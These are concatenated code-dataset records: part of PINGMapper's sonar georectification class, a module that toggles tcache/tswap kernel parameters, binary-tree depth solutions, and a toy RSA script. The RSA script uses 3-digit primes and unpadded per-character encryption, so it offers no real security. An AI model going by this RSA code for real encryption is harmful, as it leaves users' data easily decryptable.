'ping_cnt', 'time_s', 'pix_m', 'lons', 'lats', 'utm_es', 'utm_ns', 'cog', 'dep_m']].copy()\r\n sDF = sDF[['record_num', 'chunk_id', 'ping_cnt', 'time_s', 'lons', 'lats', 'utm_es', 'utm_ns', 'cog', 'dep_m']].copy()\r\n sDF.rename(columns={'lons': 'trk_lons', 'lats': 'trk_lats', 'utm_es': 'trk_utm_es', 'utm_ns': 'trk_utm_ns', 'cog': 'trk_cog'}, inplace=True)\r\n rsDF.rename(columns={'cog': 'range_cog'}, inplace=True)\r\n rsDF = rsDF[['record_num', 'range_lons', 'range_lats', 'range_cog']]\r\n rsDF = sDF.set_index('record_num').join(rsDF.set_index('record_num'))\r\n\r\n # Calculate easting/northing for smoothed range extent\r\n e_smth, n_smth = self.trans(rsDF[rlons].to_numpy(), rsDF[rlats].to_numpy())\r\n rsDF[res] = e_smth # Store smoothed easting range extent in rsDF\r\n rsDF[rns] = n_smth # Store smoothed northing range extent in rsDF\r\n\r\n ###########################################\r\n # Overwrite Trackline_Smth_son.beamName.csv\r\n # outCSV = os.path.join(self.metaDir, \"Trackline_Smth_\"+self.beamName+\".csv\")\r\n outCSV = self.smthTrkFile\r\n rsDF.to_csv(outCSV, index=True, float_format='%.14f')\r\n\r\n self.rangeExt = rsDF # Store smoothed range extent in rectObj\r\n return #self\r\n\r\n #===========================================================================\r\n def _checkPings(self,\r\n i,\r\n df):\r\n '''\r\n On sinuous survey transects (i.e. river bends), it is possible for range\r\n extent coordinates to overlap with each other. Overlapping sonar records\r\n will produce issues during the georectification process and need to be\r\n removed. This function checks subsequent sonar records from the current\r\n index i and determines if the sonar records overlap with the current record.\r\n If they do, they are flagged for removal.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n i : int\r\n DESCRIPTION - Current index of ping which will be compared\r\n against subsequent sonar records.\r\n df : Pandas DataFrame\r\n DESCRIPTION - DataFrame containing range extent coordinates of sonar\r\n records.\r\n\r\n ----------------------------\r\n Required Pre-processing step\r\n ----------------------------\r\n Called from self._interpRangeCoords()\r\n\r\n -------\r\n Returns\r\n -------\r\n A dictionary containing dataframe index as key and bool value indicating\r\n if dataframe ping should be dropped or not.\r\n\r\n --------------------\r\n Next Processing Step\r\n --------------------\r\n Returns dictionary to self._interpRangeCoords()\r\n '''\r\n range = 'range' # range distance\r\n x = 'range_e' # range easting extent coordinate\r\n y = 'range_n' # range northing extent coordinate\r\n dThresh = 'distThresh' # max distance to check for overlap\r\n tDist = 'track_dist' # straight line distance from ping i to subsequent sonar records\r\n toCheck = 'toCheck' # Flag indicating subsequent ping is close enough to i to check for potential overlap\r\n toDrop = 'toDrop' # Flag indicating ping overlaps with i\r\n es = 'utm_es' #Trackline smoothed easting\r\n ns = 'utm_ns' #Trackline smoothed northing\r\n\r\n ###########\r\n # Filter df\r\n rowI = df.loc[i] # Get current df row to compare against\r\n df = df.copy() # Make copy of dataframe\r\n df = df.iloc[df.index > i] # Filter out first (i.e. 
current) row\r\n\r\n        #########################\r\n        # Calc distance threshold\r\n        ## We only need to check sonar records which are close enough to the\r\n        ## current ping to potentially overlap.\r\n        df[dThresh] = rowI[range] + df[range]\r\n\r\n        # Calc straight line distance along the track from current ping\r\n        ## to all other sonar records. Subsequent sonar records cannot overlap\r\n        ## the current ping if they are farther than the threshold distance.\r\n        rowIx, rowIy = rowI[x], rowI[y] # Get current ping range extent coordinates\r\n        dfx, dfy = df[x].to_numpy(), df[y].to_numpy() # Get subsequent ping range extent coordinates\r\n        dist = self._getDist(rowIx, rowIy, dfx, dfy) # Calculate distance from current ping\r\n\r\n        # Check if dist < distThresh. True==Check for possible overlap; False==No need to check\r\n        df[tDist] = dist # Store distance calculation\r\n        df.loc[df[tDist] <= df[dThresh], toCheck] = True # Check for overlap\r\n        df.loc[df[tDist] > df[dThresh], toCheck] = False # Don't check for overlap\r\n        df[toCheck]=df[toCheck].astype(bool) # Make sure toCheck column is type bool\r\n\r\n        # Determine which sonar records overlap with current ping\r\n        line1 = ((rowI[es],rowI[ns]), (rowI[x], rowI[y])) # Store current ping coordinates as tuple\r\n        dfFilt = df[df[toCheck]==True].copy() # Get sonar records that could overlap with current\r\n        dropping = {} # Dictionary to store ping index to drop\r\n        for j, row in dfFilt.iterrows(): # Iterate subsequent sonar records (j avoids shadowing parameter i)\r\n            line2=((row[es], row[ns]), (row[x], row[y])) # Store ping coordinates to check in tuple\r\n            isIntersect = self._lineIntersect(line1, line2, row[range]) # Determine if line1 intersects line2\r\n            dfFilt.loc[j, toDrop] = isIntersect # Store bool in dataframe (don't need this but keeping in case)\r\n            if isIntersect == True: # If line2 intersects line1, flag ping for dropping\r\n                dropping[j]=isIntersect\r\n\r\n        return dropping\r\n\r\n    #===========================================================================\r\n    def _getDist(self,\r\n                 aX,\r\n                 aY,\r\n                 bX,\r\n                 bY):\r\n        '''\r\n        Determine distance between two points \`a\` and \`b\`. \`a\` and \`b\` can also\r\n        be numpy arrays of coordinates. This function is used to calculate distance\r\n        between a single point \`a\` and a series of points \`b\` stored in numpy arrays.\r\n\r\n        ----------\r\n        Parameters\r\n        ----------\r\n        aX : float or numpy array of floats\r\n            DESCRIPTION - X coordinate of point \`a\`\r\n        aY : float or numpy array of floats\r\n            DESCRIPTION - Y coordinate of point \`a\`\r\n        bX : float or numpy array of floats\r\n            DESCRIPTION - X coordinate of point \`b\`\r\n        bY : float or numpy array of floats\r\n            DESCRIPTION - Y coordinate of point \`b\`\r\n\r\n        ----------------------------\r\n        Required Pre-processing step\r\n        ----------------------------\r\n        Called from self._checkPings() or self._lineIntersect()\r\n\r\n        -------\r\n        Returns\r\n        -------\r\n        A numpy array with distances calculated\r\n\r\n        --------------------\r\n        Next Processing Step\r\n        --------------------\r\n        Returns numpy array to self._checkPings() or self._lineIntersect()\r\n        '''\r\n        dist = np.sqrt( (bX - aX)**2 + (bY - aY)**2) # Calculate distance\r\n        return dist\r\n\r\n    #===========================================================================\r\n    def _lineIntersect(self,\r\n                       line1,\r\n                       line2,\r\n                       range):\r\n        '''\r\n        Determines if two lines intersect. 
Helper functions are included in this\r\n        method to aid in computation:\r\n\r\n        self._lineIntersect.line() : function\r\n            DESCRIPTION - Determines coefficients describing line connecting two\r\n            points.\r\n        self._lineIntersect.intersection() : function\r\n            DESCRIPTION - Determines if two (infinite) lines intersect and returns\r\n            x, y coordinates of the intersection.\r\n        self._lineIntersect.isBetween() : function\r\n            DESCRIPTION - Determines if intersecting point falls on the line\r\n            segments.\r\n\r\n        ----------\r\n        Parameters\r\n        ----------\r\n        line1 : tuple\r\n            DESCRIPTION - Two sets of points describing a line ((x1, y1), (x2, y2))\r\n        line2 : tuple\r\n            DESCRIPTION - Two sets of points describing a line ((x1, y1), (x2, y2))\r\n        range : float\r\n            DESCRIPTION - Range (length) of line2\r\n\r\n        ----------------------------\r\n        Required Pre-processing step\r\n        ----------------------------\r\n        Called from self._checkPings()\r\n\r\n        -------\r\n        Returns\r\n        -------\r\n        Bool flag indicating if line2 intersects line1\r\n\r\n        --------------------\r\n        Next Processing Step\r\n        --------------------\r\n        Returns flag to self._checkPings()\r\n        '''\r\n\r\n        #https://stackoverflow.com/questions/20677795/how-do-i-compute-the-intersection-point-of-two-lines\r\n        def line(p1, p2):\r\n            # Find general equation (normal form) coefficients to describe a line\r\n            ## connecting two points: Ax + By = C\r\n            A = (p1[1] - p2[1])\r\n            B = (p2[0] - p1[0])\r\n            C = (p1[0]*p2[1] - p2[0]*p1[1])\r\n            return A, B, -C\r\n\r\n        def intersection(L1, L2):\r\n            # Following Cramer's rules\r\n            D  = L1[0] * L2[1] - L1[1] * L2[0] # Determinant using x, y values\r\n            Dx = L1[2] * L2[1] - L1[1] * L2[2] # Determinant using x, c values\r\n            Dy = L1[0] * L2[2] - L1[2] * L2[0] # Determinant using y, c values\r\n            if D != 0: # Check if divisor == 0\r\n                x=Dx/D\r\n                y=Dy/D\r\n                return x,y # Coordinate of intersection\r\n            else:\r\n                return False # No intersection found\r\n\r\n
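        # Illustrative worked example: for line1 = ((0,0),(4,0)) and line2 = ((2,-1),(2,1)),\r\n        # line() gives L1 = (0, 4, 0) and L2 = (-2, 0, -4); then D = 0*0 - 4*(-2) = 8,\r\n        # Dx = 0*0 - 4*(-4) = 16, Dy = 0*(-4) - 0*(-2) = 0, so the infinite lines\r\n        # meet at (16/8, 0/8) = (2.0, 0.0).\r\n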
        def isBetween(line1, line2, c):\r\n            ax, ay = line1[0][0], line1[0][1] # Get x,y for line1 start point\r\n            bx, by = line1[1][0], line1[1][1] # Get x,y for line1 end point\r\n            cx, cy = c[0], c[1] # Get x,y for intersection\r\n            xIntersect=yIntersect=False # Set flags\r\n\r\n            # Check if cx,cy falls between either line's coordinates with a small\r\n            ## buffer of +-5. If it does, we will need to check distance between\r\n            ## line2 origin and (cx,cy).\r\n            if (cx >= min(ax,bx)-5) and (cx <= max(ax,bx)+5) and \\\r\n               (cy >= min(ay,by)-5) and (cy <= max(ay,by)+5):\r\n                checkDist = True\r\n            else:\r\n                checkDist = isIntersect = False\r\n\r\n            # Check distance between line2 origin and (cx,cy). If the distance is\r\n            ## shorter than the range, the intersecting point falls on the line\r\n            ## segments and the two lines do intersect.\r\n            if checkDist is True:\r\n                x,y = line2[0][0], line2[0][1]\r\n                dist = self._getDist(x, y, cx, cy)\r\n                if range < dist:\r\n                    isIntersect = False\r\n                else:\r\n                    isIntersect = True\r\n\r\n            return isIntersect\r\n\r\n        L1 = line(line1[0], line1[1]) # Get coefficients for line1\r\n        L2 = line(line2[0], line2[1]) # Get coefficients for line2\r\n        c = intersection(L1, L2) # (x, y) of intersection, or False if lines are parallel\r\n        if c is not False: # intersection() returns a coordinate tuple, never True\r\n            I = isBetween(line1, line2, c) # Determine if intersect occurs on line segments\r\n        else:\r\n            I = False\r\n        return I\r\n\r\n    ############################################################################\r\n    # Rectify sonar imagery                                                    #\r\n    ############################################################################\r\n\r\n    def _rectSonParallel(self,\r\n                         chunk,\r\n                         filt=50,\r\n                         wgs=False,\r\n                         son=True):\r\n        '''\r\n        This function will georectify sonar tiles with water column present\r\n        (rect_wcp) OR water column removed and slant range corrected (rect_wcr).\r\n        Sonar intensity will be loaded directly from the .SON file. Once\r\n        determined, each chunk will be iterated, sonar intensities loaded into\r\n        memory and:\r\n        1) Pixel (pix) coordinates are formatted as a numpy array based on shape\r\n        of sonar chunk. Coordinates are filtered to aid computation efficiency.\r\n        2) Geographic, or destination (dst), coordinates for the smoothed trackline\r\n        and range extent are loaded from the \"Trackline_Smth_BXXX.csv\" file and\r\n        formatted as a numpy array and filtered as pix.\r\n        3) A Piecewise Affine Transform is used to map pix coordinates to the shape\r\n        of the dst coordinates in order to warp (or rectify) the sonar intensities.\r\n        Warped sonar intensities are stored in a new numpy array.\r\n        4) The warped array is then mapped to geographic coordinates using a\r\n        transformation matrix and exported as a geotiff.\r\n\r\n        ----------\r\n        Parameters\r\n        ----------\r\n        chunk : int\r\n            DESCRIPTION - Chunk number of the sonar tile to rectify.\r\n        filt : int\r\n            DESCRIPTION - Every \`filt\` ping will be used to fit a spline.\r\n        wgs : bool\r\n            DESCRIPTION - Flag indicating if sonar images should be rectified using\r\n            WGS 1984 coordinate system [True] or UTM state plane [False]\r\n        son : bool\r\n            DESCRIPTION - Flag indicating if sonar imagery [True] or a substrate\r\n            classification [False] is being rectified.\r\n\r\n        ----------------------------\r\n        Required Pre-processing step\r\n        ----------------------------\r\n        self._getRangeCoords()\r\n\r\n        -------\r\n        Returns\r\n        -------\r\n        Georectified geotiffs\r\n\r\n        --------------------\r\n        Next Processing Step\r\n        --------------------\r\n        NA\r\n        '''\r\n        filterIntensity = False\r\n\r\n        if son:\r\n            # Create output directory if it doesn't exist\r\n            outDir = self.outDir # Parent directory\r\n            try:\r\n                os.mkdir(outDir)\r\n            except:\r\n                pass\r\n\r\n        # Get trackline/range extent file path\r\n        trkMetaFile = os.path.join(self.metaDir, \"Trackline_Smth_\"+self.beamName+\".csv\")\r\n\r\n        # What coordinates should be used?\r\n        ## Use WGS 1984 coordinates and set variables as needed\r\n        if wgs is True:\r\n            epsg = self.humDat['wgs']\r\n            xRange = 'range_lons'\r\n            yRange = 'range_lats'\r\n            xTrk = 'trk_lons'\r\n            yTrk = 'trk_lats'\r\n        ## Use projected coordinates and set variables as needed\r\n        else:\r\n            epsg = self.humDat['epsg']\r\n            xRange = 'range_es'\r\n            yRange = 'range_ns'\r\n            xTrk = 'trk_utm_es'\r\n            yTrk = 'trk_utm_ns'\r\n\r\n        # Determine leading zeros to match naming convention\r\n        addZero = self._addZero(chunk)\r\n\r\n
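        # Rough sketch of the mapping built below: pixel rows 0 and 'rows' of each\r\n        # image column map to that ping's trackline origin and range-extent point\r\n        # in dst, so every sonar column is stretched between its origin and its\r\n        # outer extent.\r\n        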
#################################\r\n # Prepare pixel (pix) coordinates\r\n ## Pix coordinates describe the size of the coordinates in pixel\r\n ## coordinates (top left of image == (0,0); top right == (0,nchunk)...)\r\n\r\n # Filter sonMetaDF by chunk\r\n if not hasattr(self, 'sonMetaDF'):\r\n self._loadSonMeta()\r\n\r\n sonMetaAll = self.sonMetaDF\r\n isChunk = sonMetaAll['chunk_id']==chunk\r\n sonMeta = sonMetaAll[isChunk].reset_index()\r\n # Update class attributes based on current chunk\r\n # self.pingMax = sonMeta['ping_cnt'].astype(int).max() # store to determine max range per chunk\r\n # self.headIdx = sonMeta['index'].astype(int) # store byte offset per ping\r\n # self.pingCnt = sonMeta['ping_cnt'].astype(int) # store ping count per ping\r\n\r\n self.pingMax = np.nanmax(sonMeta['ping_cnt']) # store to determine max range per chunk\r\n self.headIdx = sonMeta['index'] # store byte offset per ping\r\n self.pingCnt = sonMeta['ping_cnt'] # store ping count per ping\r\n\r\n if son:\r\n # Open image to rectify\r\n self._loadSonChunk()\r\n else:\r\n # Rectifying substrate classification\r\n pass\r\n # if filterIntensity:\r\n # self._doPPDRC()\r\n\r\n # Remove shadows\r\n if self.remShadow:\r\n # Get mask\r\n self._SHW_mask(chunk)\r\n\r\n # Mask out shadows\r\n self.sonDat = self.sonDat*self.shadowMask\r\n del self.shadowMask\r\n\r\n # # Pyhum corrections\r\n # do_correct = False\r\n # if do_correct:\r\n # self.sonDat = doPyhumCorrections(self, sonMeta)\r\n\r\n img = self.sonDat\r\n\r\n # For each ping, we need the pixel coordinates where the sonar\r\n ## originates on the trackline, and where it terminates based on the\r\n ## range of the ping. This results in an array of coordinate\r\n ## pairs that describe the edge of the non-rectified image tile.\r\n rows, cols = img.shape[0], img.shape[1] # Determine number rows/cols\r\n pix_cols = np.arange(0, cols) # Create array of column indices\r\n pix_rows = np.linspace(0, rows, 2).astype('int') # Create array of two row indices (0 for points at ping origin, `rows` for max range)\r\n pix_rows, pix_cols = np.meshgrid(pix_rows, pix_cols) # Create grid arrays that we can stack together\r\n pixAll = np.dstack([pix_rows.flat, pix_cols.flat])[0] # Stack arrays to get final map of pix pixel coordinats [[row1, col1], [row2, col1], [row1, col2], [row2, col2]...]\r\n\r\n # Create mask for filtering array. 
This makes fitting PiecewiseAffineTransform\r\n ## more efficient\r\n mask = np.zeros(len(pixAll), dtype=bool) # Create mask same size as pixAll\r\n mask[0::filt] = 1 # Filter row coordinates\r\n mask[1::filt] = 1 # Filter column coordinates\r\n mask[-2], mask[-1] = 1, 1 # Make sure we keep last row/col coordinates\r\n\r\n # Filter pix\r\n pix = pixAll[mask]\r\n\r\n #######################################\r\n # Prepare destination (dst) coordinates\r\n ## Destination coordinates describe the geographic location in lat/lon\r\n ## or easting/northing that directly map to the pix coordinates.\r\n\r\n # Open smoothed trackline/range extent file\r\n trkMeta = pd.read_csv(trkMetaFile)\r\n trkMeta = trkMeta[trkMeta['chunk_id']==chunk].reset_index(drop=False) # Filter df by chunk_id\r\n # pix_m = trkMeta['pix_m'].min() # Get pixel size\r\n pix_m = self.pixM # Get pixel size\r\n\r\n # Get range (outer extent) coordinates [xR, yR] to transposed numpy arrays\r\n xR, yR = trkMeta[xRange].to_numpy().T, trkMeta[yRange].to_numpy().T\r\n xyR = np.vstack((xR, yR)).T # Stack the arrays\r\n\r\n # Get trackline (origin of ping) coordinates [xT, yT] to transposed numpy arrays\r\n xT, yT = trkMeta[xTrk].to_numpy().T, trkMeta[yTrk].to_numpy().T\r\n xyT = np.vstack((xT, yT)).T # Stack the arrays\r\n del trkMeta\r\n\r\n # Stack the coordinates (range[0,0], trk[0,0], range[1,1]...) following\r\n ## pattern of pix coordinates\r\n dstAll = np.empty([len(xyR)+len(xyT), 2]) # Initialize appropriately sized np array\r\n dstAll[0::2] = xyT # Add trackline coordinates\r\n dstAll[1::2] = xyR # Add range extent coordinates\r\n\r\n # Filter dst using previously made mask\r\n dst = dstAll[mask]\r\n del mask\r\n\r\n ##################\r\n ## Before applying a geographic projection to the image, the image\r\n ## must be warped to conform to the shape specified by the geographic\r\n ## coordinates. We don't want to warp the image to real-world dimensions,\r\n ## so we will normalize and rescale the dst coordinates to give the\r\n ## top-left coordinate a value of (0,0)\r\n\r\n # Determine min/max for rescaling\r\n xMin, xMax = dst[:,0].min(), dst[:,0].max() # Min/Max of x coordinates\r\n yMin, yMax = dst[:,1].min(), dst[:,1].max() # Min/Max of y coordinates\r\n\r\n # Determine output shape dimensions\r\n outShapeM = [xMax-xMin, yMax-yMin] # Calculate range of x,y coordinates\r\n outShape=[0,0]\r\n # Divide by pixel size to arrive at output shape of warped image\r\n outShape[0], outShape[1] = round(outShapeM[0]/pix_m,0), round(outShapeM[1]/pix_m,0)\r\n\r\n # Rescale destination coordinates\r\n # X values\r\n xStd = (dst[:,0]-xMin) / (xMax-xMin) # Standardize\r\n xScaled = xStd * (outShape[0] - 0) + 0 # Rescale to output shape\r\n dst[:,0] = xScaled # Store rescaled x coordinates\r\n\r\n # Y values\r\n yStd = (dst[:,1]-yMin) / (yMax-yMin) # Standardize\r\n yScaled = yStd * (outShape[1] - 0) + 0 # Rescale to output shape\r\n dst[:,1] = yScaled # Store rescaled y coordinates\r\n\r\n ########################\r\n # Perform transformation\r\n # PiecewiseAffineTransform\r\n tform = PiecewiseAffineTransform()\r\n tform.estimate(pix, dst) # Calculate H matrix\r\n\r\n ##############\r\n # Save Geotiff\r\n ## In order to visualize the warped image in a GIS at the appropriate\r\n ## spatial extent, the pixel coordinates of the warped image must be\r\n ## mapped to spatial coordinates. 
This is accomplished by calculating\r\n ## the transformation matrix using rasterio.transform.from_origin\r\n\r\n # First get the min/max values for x,y geospatial coordinates\r\n xMin, xMax = dstAll[:,0].min(), dstAll[:,0].max()\r\n yMin, yMax = dstAll[:,1].min(), dstAll[:,1].max()\r\n\r\n # Calculate x,y resolution of a single pixel\r\n xres = (xMax - xMin) / outShape[0]\r\n yres = (yMax - yMin) / outShape[1]\r\n # # Scale by factor for down/upsampling\r\n # xres = (xMax - xMin) / (outShape[0]*pix_res_factor)\r\n # yres = (yMax - yMin) / (outShape[1]*pix_res_factor)\r\n\r\n # Calculate transformation matrix by providing geographic coordinates\r\n ## of upper left corner of the image and the pixel size\r\n transform = from_origin(xMin - xres/2, yMax - yres/2, xres, yres)\r\n\r\n if self.rect_wcp:\r\n imgOutPrefix = 'rect_wcp'\r\n outDir = os.path.join(self.outDir, imgOutPrefix) # Sub-directory\r\n\r\n try:\r\n os.mkdir(outDir)\r\n except:\r\n pass\r\n\r\n # egn\r\n if self.egn:\r\n self._egn_wcp(chunk, sonMeta)\r\n self._egnDoStretch()\r\n\r\n img = self.sonDat.copy()\r\n\r\n img[0]=0 # To fix extra white on curves\r\n\r\n # Warp image from the input shape to output shape\r\n out = warp(img.T,\r\n tform.inverse,\r\n output_shape=(outShape[1], outShape[0]),\r\n mode='constant',\r\n cval=np.nan,\r\n clip=False,\r\n preserve_range=True)\r\n\r\n # Rotate 180 and flip\r\n # https://stackoverflow.com/questions/47930428/how-to-rotate-an-array-by-%C2%B1-180-in-an-efficient-way\r\n out = np.flip(np.flip(np.flip(out,1),0),1).astype('uint8')\r\n\r\n projName = os.path.split(self.projDir)[-1] # Get project name\r\n beamName = self.beamName # Determine which sonar beam we are working with\r\n imgName = projName+'_'+imgOutPrefix+'_'+beamName+'_'+addZero+str(int(chunk))+'.tif' # Create output image name\r\n\r\n gtiff = os.path.join(outDir, imgName) # Output file name\r\n\r\n # Export georectified image\r\n with rasterio.open(\r\n gtiff,\r\n 'w',\r\n driver='GTiff',\r\n height=out.shape[0],\r\n width=out.shape[1],\r\n count=1,\r\n dtype=out.dtype,\r\n crs=epsg,\r\n transform=transform,\r\n compress='lzw'\r\n ) as dst:\r\n dst.nodata=0\r\n dst.write(out,1)\r\n dst.write_colormap(1, self.son_colorMap)\r\n dst=None\r\n ## Uncomment below code if overviews should be created for each file\r\n # dst.build_overviews([2 ** j for j in range(1,8)], Resampling.nearest)\r\n # dst.update_tags(ns='rio_overview', resampling='nearest')\r\n # dst.close()\r\n\r\n del out, dst, img\r\n\r\n if self.rect_wcr:\r\n imgOutPrefix = 'rect_wcr'\r\n outDir = os.path.join(self.outDir, imgOutPrefix) # Sub-directory\r\n\r\n if son:\r\n try:\r\n os.mkdir(outDir)\r\n except:\r\n pass\r\n\r\n self._WCR_SRC(sonMeta)\r\n\r\n # Empirical gain normalization\r\n if not self.rect_wcp:\r\n if self.egn:\r\n self._egn()\r\n self.sonDat = np.nan_to_num(self.sonDat, nan=0)\r\n self._egnDoStretch()\r\n\r\n img = self.sonDat\r\n\r\n img[0]=0 # To fix extra white on curves\r\n\r\n # Warp image from the input shape to output shape\r\n out = warp(img.T,\r\n tform.inverse,\r\n output_shape=(outShape[1], outShape[0]),\r\n mode='constant',\r\n cval=np.nan,\r\n clip=False,\r\n preserve_range=True)\r\n\r\n del img, self.sonDat\r\n\r\n # Warping substrate classification adds anomlies which must be removed\r\n if not son:\r\n # Set minSize\r\n min_size = 1500\r\n\r\n # Label all regions\r\n lbl = label(out)\r\n\r\n # First set small objects to background value (0)\r\n noSmall = remove_small_objects(lbl, min_size)\r\n del lbl\r\n\r\n # Punch holes in original 
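label\r\n            # ~(noSmall==0) is True only inside regions that survived the size\r\n            # filter, so multiplying by it zeroes the small speckle regions.\r\n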
            holes = ~(noSmall==0)\r\n            del noSmall\r\n\r\n            l = out*holes\r\n\r\n            # Remove small holes\r\n            # Convert l to binary\r\n            binary_objects = l.astype(bool)\r\n            # Remove the holes\r\n            binary_filled = remove_small_holes(binary_objects, min_size)\r\n            # Recover classification with holes filled\r\n            out = watershed(binary_filled, l, mask=binary_filled)\r\n            del binary_objects, binary_filled, l\r\n\r\n        # Rotate 180 and flip\r\n        # https://stackoverflow.com/questions/47930428/how-to-rotate-an-array-by-%C2%B1-180-in-an-efficient-way\r\n        out = np.flip(np.flip(np.flip(out,1),0),1).astype('uint8')\r\n\r\n        projName = os.path.split(self.projDir)[-1] # Get project name\r\n        beamName = self.beamName # Determine which sonar beam we are working with\r\n        imgName = projName+'_'+imgOutPrefix+'_'+beamName+'_'+addZero+str(int(chunk))+'.tif' # Create output image name\r\n\r\n        if son:\r\n            gtiff = os.path.join(outDir, imgName) # Output file name\r\n        else:\r\n            outDir = os.path.join(self.substrateDir, 'map_sub')\r\n            if not os.path.exists(outDir):\r\n                os.mkdir(outDir)\r\n            gtiff = os.path.join(outDir, imgName) # Output file name\r\n            gtiff = gtiff.replace(imgOutPrefix, 'sub_map')\r\n\r\n\r\n        # Export georectified image\r\n        with rasterio.open(\r\n            gtiff,\r\n            'w',\r\n            driver='GTiff',\r\n            height=out.shape[0],\r\n            width=out.shape[1],\r\n            count=1,\r\n            dtype=out.dtype,\r\n            crs=epsg,\r\n            transform=transform,\r\n            compress='lzw',\r\n            resampling=Resampling.bilinear\r\n            ) as dst:\r\n            dst.nodata=0\r\n            dst.write(out,1)\r\n            dst.write_colormap(1, self.son_colorMap)\r\n            dst=None\r\n            ## Uncomment below code if overviews should be created for each file\r\n            # dst.build_overviews([2 ** j for j in range(1,8)], Resampling.nearest)\r\n            # dst.update_tags(ns='rio_overview', resampling='nearest')\r\n            # dst.close()\r\n\r\n        del out, dst\r\n\r\n        gc.collect()\r\n\r\n        # DON'T RETURN SELF\r\n        # Unnecessary here and leads to massive memory leaks\r\n        # Also very slow\r\n\r\n        return\r\n\r\n    #===========================================================================\r\n    def _getSonColorMap(self, name):\r\n        '''\r\n        Build a 256-entry colormap for GeoTIFF export from a matplotlib colormap name.\r\n        '''\r\n\r\n        son_colorMap = {}\r\n        try:\r\n            color = cm.get_cmap(name, 256) \r\n        except:\r\n            print('****WARNING*****\\n', name, 'is not a valid colormap.\\nSetting to Greys...')\r\n            color = cm.get_cmap('Greys', 256)\r\n\r\n        # need integer values for 0-255 but the colormap returns floats in 0-1\r\n        color = color(np.linspace(0, 1, 256))\r\n        color = rescale(color, 0, 255).astype('uint8')\r\n\r\n        vals = range(0, 256) # include value 255 so all 256 levels are mapped\r\n        for i,v in zip(vals, (color)):\r\n            son_colorMap[i] = tuple(v)\r\n\r\n        self.son_colorMap = son_colorMap\r\n        del son_colorMap, color\r\n        return\r\n","repo_name":"CameronBodine/PINGMapper","sub_path":"src/class_rectObj.py","file_name":"class_rectObj.py","file_ext":"py","file_size_in_byte":57914,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"72"} +{"seq_id":"1620562819","text":"import logging\n\nimport config\n\nlogger = logging.getLogger(__name__)\n\n\ndef _set_active(mod, active):\n    available = False\n    try:\n        with open(\"/sys/module/%s/parameters/enabled\" % mod, 'r') as f:\n            if f.read(1) == 'Y':\n                available = True\n    except IOError:\n        pass\n    if not available:\n        if active:\n            logger.error(\"Failed to activate %s: Module is unavailable\" % mod)\n        return\n    try:\n        with open(\"/sys/module/%s/parameters/active\" % mod, 'w') as f:\n            f.write('Y' if active else 'N')\n    except IOError as err:\n        logger.error(\"Failed to %s %s: %s\" %\n                     (\"activate\" if active else \"deactivate\", mod, err))\n    else:\n        
logger.info(\"%s %s\" %\n (mod, \"activated\" if active else \"deactivated\"))\n\n\ndef initialize():\n if config.TMEM__TCACHE:\n _set_active('tcache', True)\n if config.TMEM__TSWAP:\n _set_active('tswap', True)\n\n\ndef finilize():\n if config.TMEM__TCACHE:\n _set_active('tcache', False)\n if config.TMEM__TSWAP:\n _set_active('tswap', False)\n","repo_name":"Cloudxtreme/vcmmd","sub_path":"vcmmd/tmem.py","file_name":"tmem.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"31981137524","text":" \n\nclass Solution2(object):\n def maxDepth(self, root):\n if not root:\n return 0\n return 1+ max(self.maxDepth(root.right),self.maxDepth(root.left))\n\n# Depth of last node will be the greatest\nclass BFS(object):\n def maxDepth(self, root):\n if not root:\n return 0\n queue = [(root,1),]\n while queue:\n node, val = queue.pop(0)\n if node.left:\n queue.append((node.left, val+1),)\n if node.right:\n queue.append((node.right, val+1),)\n if not queue:\n return val\n\nclass IterativeDFS(object):\n def maxDepth(self, root):\n stack = []\n if not root:\n return 0\n stack.append((1, root),)\n depth = 0\n while stack:\n current_depth, root = stack.pop()\n if root:\n depth = max(depth, current_depth)\n stack.append((current_depth + 1, root.left))\n stack.append((current_depth + 1, root.right))\n return depth","repo_name":"bailey8/Algorithms-and-Data-Structures","sub_path":"LEETCODELEETCODE/CC Graph Cycle Traversals/Tree/MaximumDepthOfBinaryTree.py","file_name":"MaximumDepthOfBinaryTree.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"234720638","text":"\nfrom random import randint\n\ndef pgcd(a, b):\n if b == 0:\n return a\n else:\n r = a % b\n return pgcd(b, r)\n\ndef getFactors(n):\n factors = [];\n for i in range(1, n + 1):\n if n % i == 0:\n factors.append(i)\n return factors\n\ndef get_p_q():\n\ta = randint(100, 999)\n\twhile True:\n\t\tif getFactors(a) == [1, a]:\n\t\t\treturn a\n\t\t\tbreak\n\t\ta = randint(100, 999) \n\ndef generator():\n\tp,q = get_p_q(),get_p_q()\n\t#p,q = 137, 751\n\tn = p*q\n\tpn = (p-1)*(q-1)\n\n\tif p > q:\n\t\tg = p\n\n\tif q > p:\n\t\tg = q\n\n\te = g + 1\n\twhile e < pn:\n\t\tif pgcd(pn, e) == 1:\n\t\t\t#print(\"e = \", e)\n\t\t\tbreak\n\t\te = e + 1\n\n\td = e + 1\n\twhile d < pn:\n\t\tif e * d % pn == 1:\n\t\t\t#print(\"d = \", d)\n\t\t\tbreak\n\t\td = d + 1\n\tpublic_key = e,n\n\tprivate_key = d,n\n\tprint(\"your public key is: \", public_key)\n\tprint(\"your private key is: \", private_key)\n\ndef en_crypt(e, n):\n\tprint(\"entrer le message à crypter\")\n\tc = input()\n\td = []\n\tfor i in c:\n\t\td.append(ord(i))\n\tv = 0\n\tcrypt_d = []\n\twhile v < len(d):\n\t\tcrypt_d.append(pow(d[int(v)], e)%n)\n\t\tv = v + 1\n\tprint(crypt_d)\n\td = []\n\ndef de_crypt(d, n):\n\tprint(\"Entrer le message à décrypter (s'éparer les nombres par des virgules)\")\n\tcc = input().split(\",\")\n\tcc = list(map(int, cc))\n\tv2 = 0\n\td2 = []\n\twhile v2 < len(cc):\n\t\td2.append(pow(cc[int(v2)], d)%n)\n\t\tv2 = v2 + 1\n\t#print(d2)\n\n\tj = []\n\tfor i in d2:\n\t\tj.append(chr(i))\n\tj = ''.join(j)\n\tprint(j)\n\tj = []\n","repo_name":"ebdm13/RSA-algorythme-module","sub_path":"RSA.py","file_name":"RSA.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} 